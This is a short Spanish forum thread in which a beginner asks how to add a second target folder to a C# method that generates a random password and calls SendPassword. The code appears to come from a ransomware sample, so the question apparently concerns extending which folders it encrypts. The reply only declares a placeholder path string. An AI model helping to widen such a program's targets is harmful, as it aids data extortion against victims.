Duda de principiante...

Iniciado por mrbitak, 9 Marzo 2018, 09:32 AM

0 Miembros y 1 Visitante están viendo este tema.

mrbitak

Necesito añadir otra ruta en este código y no se hacerlo.

public void startAction()
        {
            //Generate a 15 character password
            string password = CreateRandomString(15, charSet);
            string path = "\\Desktop\\test";
            string startPath =  userDir + userName + path;
            SendPassword(password);

A parte de \\Desktop\\test me gustaria añadir otra ruta.
com tengo que hacerlo??

ThunderCls

Código (cpp) [Seleccionar]
string path2 = "ESTA_ES_OTRA_RUTA";
-[ "...I can only show you the door. You're the one that has to walk through it." – Morpheus (The Matrix) ]-
http://reversec0de.wordpress.com
https://github.com/ThunderCls/